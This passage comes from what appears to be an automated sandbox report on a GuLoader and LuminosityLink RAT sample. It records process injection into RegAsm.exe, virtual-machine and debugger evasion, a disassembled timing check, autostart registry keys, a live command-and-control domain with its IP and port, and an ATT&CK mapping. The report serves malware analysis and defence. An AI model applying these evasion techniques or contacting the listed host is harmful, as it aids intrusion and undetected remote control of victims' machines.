            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_00F08F5A 13_2_00F08F5A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 19_2_00C38F5A 19_2_00C38F5A
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: New Inquiry 903838737777721102029393003938.exe, 00000003.00000002.24037990478.00000000005FA000.00000004.00000020.sdmpBinary or memory string: _ROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: RegAsm.exe, 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, RegAsm.exe, 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeRDTSC instruction interceptor: First address: 000000000224468B second address: 000000000224468B instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007F8484416248h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f cmp ax, cx 0x00000022 test edx, eax 0x00000024 pop ecx 0x00000025 add edi, edx 0x00000027 dec ecx 0x00000028 cmp cx, dx 0x0000002b cmp ecx, 00000000h 0x0000002e jne 00007F8484416228h 0x00000030 push ecx 0x00000031 cmp ax, ax 0x00000034 call 00007F848441626Bh 0x00000039 call 00007F848441625Ah 0x0000003e lfence 0x00000041 mov edx, dword ptr [7FFE0014h] 0x00000047 lfence 0x0000004a ret 0x0000004b mov esi, edx 0x0000004d pushad 0x0000004e rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_00F016BE rdtsc 13_2_00F016BE
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\ProgramData\782401\anibtcent.exe.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeWindow / User API: threadDelayed 1395Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6984Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6168Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 1564Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 1528Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\ProgramData\782401\anibtcent.exe.exe TID: 2812Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 6900Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 5616Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: New Inquiry 903838737777721102029393003938.exe, 00000003.00000002.24064512847.0000000004909000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.24305216551.0000000002B39000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000012.00000002.24253821451.00000000046A9000.00000004.00000001.sdmp, RegAsm.exe, 00000013.00000002.24267119140.0000000002959000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000017.00000002.24332844184.0000000004B89000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: New Inquiry 903838737777721102029393003938.exe, 00000003.00000002.24064512847.0000000004909000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.24305216551.0000000002B39000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000012.00000002.24253821451.00000000046A9000.00000004.00000001.sdmp, RegAsm.exe, 00000013.00000002.24267119140.0000000002959000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000017.00000002.24332844184.0000000004B89000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: demisphereklediskene.exe, 00000017.00000002.24332844184.0000000004B89000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
            Source: RegAsm.exe, 0000000D.00000002.24321865954.000000001DD3A000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: New Inquiry 903838737777721102029393003938.exe, 00000003.00000002.24064512847.0000000004909000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.24305216551.0000000002B39000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000012.00000002.24253821451.00000000046A9000.00000004.00000001.sdmp, RegAsm.exe, 00000013.00000002.24267119140.0000000002959000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000017.00000002.24332844184.0000000004B89000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: New Inquiry 903838737777721102029393003938.exe, 00000003.00000002.24064512847.0000000004909000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.24305216551.0000000002B39000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000012.00000002.24253821451.00000000046A9000.00000004.00000001.sdmp, RegAsm.exe, 00000013.00000002.24267119140.0000000002959000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000017.00000002.24332844184.0000000004B89000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: New Inquiry 903838737777721102029393003938.exe, 00000003.00000002.24064512847.0000000004909000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.24305216551.0000000002B39000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000012.00000002.24253821451.00000000046A9000.00000004.00000001.sdmp, RegAsm.exe, 00000013.00000002.24267119140.0000000002959000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000017.00000002.24332844184.0000000004B89000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: demisphereklediskene.exe, 00000017.00000002.24332844184.0000000004B89000.00000004.00000001.sdmpBinary or memory string: vmicvss
            Source: RegAsm.exe, 0000000D.00000002.24301433100.00000000010A5000.00000004.00000020.sdmp, RegAsm.exe, 00000013.00000002.24265299276.0000000000E52000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW&
            Source: RegAsm.exe, 0000000D.00000002.24300776016.000000000104B000.00000004.00000020.sdmp, RegAsm.exe, 00000013.00000002.24264785299.0000000000DDB000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: RegAsm.exe, 00000013.00000002.24265233992.0000000000E4A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWen-USn
            Source: RegAsm.exe, 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, RegAsm.exe, 00000013.00000002.24264401230.0000000000C30000.00000040.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: New Inquiry 903838737777721102029393003938.exe, 00000003.00000002.24064512847.0000000004909000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.24305216551.0000000002B39000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000012.00000002.24253821451.00000000046A9000.00000004.00000001.sdmp, RegAsm.exe, 00000013.00000002.24267119140.0000000002959000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000017.00000002.24332844184.0000000004B89000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: RegAsm.exe, 0000000D.00000002.24328207020.0000000021190000.00000002.00000001.sdmpBinary or memory string: Insufficient privileges. Only administrators or users that are members of the Hyper-V Administrators user group are permitted to access virtual machines or containers. To add yourself to the Hyper-V Administrators user group, please see https://aka.ms/hcsadmin for more information.
            Source: New Inquiry 903838737777721102029393003938.exe, 00000003.00000002.24064512847.0000000004909000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.24305216551.0000000002B39000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000012.00000002.24253821451.00000000046A9000.00000004.00000001.sdmp, RegAsm.exe, 00000013.00000002.24267119140.0000000002959000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000017.00000002.24332844184.0000000004B89000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: New Inquiry 903838737777721102029393003938.exe, 00000003.00000002.24064512847.0000000004909000.00000004.00000001.sdmp, RegAsm.exe, 0000000D.00000002.24305216551.0000000002B39000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000012.00000002.24253821451.00000000046A9000.00000004.00000001.sdmp, RegAsm.exe, 00000013.00000002.24267119140.0000000002959000.00000004.00000001.sdmp, demisphereklediskene.exe, 00000017.00000002.24332844184.0000000004B89000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: New Inquiry 903838737777721102029393003938.exe, 00000003.00000002.24037990478.00000000005FA000.00000004.00000020.sdmpBinary or memory string: _rogram Files\Qemu-ga\qemu-ga.exe
            Source: demisphereklediskene.exe, 00000017.00000002.24332844184.0000000004B89000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging:

            barindex
            Contains functionality to hide a thread from the debuggerShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_00F09EF3 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C013_2_00F09EF3
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_00F016BE rdtsc 13_2_00F016BE
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_00F02A91 mov eax, dword ptr fs:[00000030h]13_2_00F02A91
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_00F0949D mov eax, dword ptr fs:[00000030h]13_2_00F0949D
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_00F01E6C mov eax, dword ptr fs:[00000030h]13_2_00F01E6C
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_00F081B7 mov eax, dword ptr fs:[00000030h]13_2_00F081B7
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_00F08799 mov eax, dword ptr fs:[00000030h]13_2_00F08799
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_00F04109 mov eax, dword ptr fs:[00000030h]13_2_00F04109
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 19_2_00C32A91 mov eax, dword ptr fs:[00000030h]19_2_00C32A91
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 19_2_00C3949D mov eax, dword ptr fs:[00000030h]19_2_00C3949D
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 19_2_00C31E6C mov eax, dword ptr fs:[00000030h]19_2_00C31E6C
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 19_2_00C38799 mov eax, dword ptr fs:[00000030h]19_2_00C38799
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 19_2_00C381B7 mov eax, dword ptr fs:[00000030h]19_2_00C381B7
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 19_2_00C34109 mov eax, dword ptr fs:[00000030h]19_2_00C34109
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: F00000Jump to behavior
            Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: C30000Jump to behavior
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe' Jump to behavior
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exe' Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\ProgramData\782401\anibtcent.exe.exe 'C:\ProgramData\782401\anibtcent.exe.exe' Jump to behavior
            Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Hustankesgy3\demisphereklediskene.exe' Jump to behavior
            Source: RegAsm.exe, 0000000D.00000002.24304442627.00000000016E1000.00000002.00000001.sdmp, demisphereklediskene.exe, 00000017.00000002.24301285647.0000000000D21000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: RegAsm.exe, 0000000D.00000002.24304442627.00000000016E1000.00000002.00000001.sdmp, demisphereklediskene.exe, 00000017.00000002.24301285647.0000000000D21000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: RegAsm.exe, 0000000D.00000002.24304442627.00000000016E1000.00000002.00000001.sdmp, demisphereklediskene.exe, 00000017.00000002.24301285647.0000000000D21000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: RegAsm.exe, 0000000D.00000002.24304442627.00000000016E1000.00000002.00000001.sdmp, demisphereklediskene.exe, 00000017.00000002.24301285647.0000000000D21000.00000002.00000001.sdmpBinary or memory string: 1Program Manager
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected LuminosityLink RATShow sources
            Source: Yara matchFile source: 0000000D.00000002.24321865954.000000001DD3A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1440, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected LuminosityLink RATShow sources
            Source: Yara matchFile source: 0000000D.00000002.24321865954.000000001DD3A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1440, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation1Registry Run Keys / Startup Folder31Access Token Manipulation1Masquerading21Input Capture11Security Software Discovery821Remote ServicesInput Capture11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobDLL Side-Loading1Process Injection112Virtualization/Sandbox Evasion33LSASS MemoryVirtualization/Sandbox Evasion33Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Registry Run Keys / Startup Folder31Disable or Modify Tools1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)DLL Side-Loading1Access Token Manipulation1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol1SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection112LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonHidden Files and Directories1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information1DCSyncSystem Information Discovery22Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobDLL Side-Loading1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 112557 Sample: New Inquiry   9038387377777... Startdate: 17/09/2020 Architecture: WINDOWS Score: 100 43 onedrive.live.com 2->43 45 eaup2w.sn.files.1drv.com 2->45 57 Potential malicious icon found 2->57 59 Multi AV Scanner detection for submitted file 2->59 61 Yara detected GuLoader 2->61 63 3 other signatures 2->63 9 New Inquiry   903838737777721102029393003938.exe 2->9         started        12 demisphereklediskene.exe 2->12         started        14 RegAsm.exe 4 2->14         started        16 demisphereklediskene.exe 2->16         started        signatures3 process4 signatures5 83 Writes to foreign memory regions 9->83 85 Tries to detect Any.run 9->85 87 Hides threads from debuggers 9->87 18 RegAsm.exe 6 23 9->18         started        23 RegAsm.exe 9->23         started        89 Multi AV Scanner detection for dropped file 12->89 25 RegAsm.exe 10 12->25         started        27 conhost.exe 14->27         started        process6 dnsIp7 47 nobawi.dvrdns.org 194.5.97.46, 3021, 49780, 49781 DANILENKODE Netherlands 18->47 49 192.168.0.2 unknown unknown 18->49 55 2 other IPs or domains 18->55 37 C:\Users\user\...\demisphereklediskene.exe, PE32 18->37 dropped 39 C:\Windows\SysWOW64\clientsvr.exe, PE32 18->39 dropped 41 C:\ProgramData\782401\anibtcent.exe.exe, PE32 18->41 dropped 65 Creates an undocumented autostart registry key 18->65 67 Creates multiple autostart registry keys 18->67 69 Creates an autostart registry key pointing to binary in C:\Windows 18->69 81 2 other signatures 18->81 29 anibtcent.exe.exe 4 18->29         started        31 conhost.exe 18->31         started        71 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual 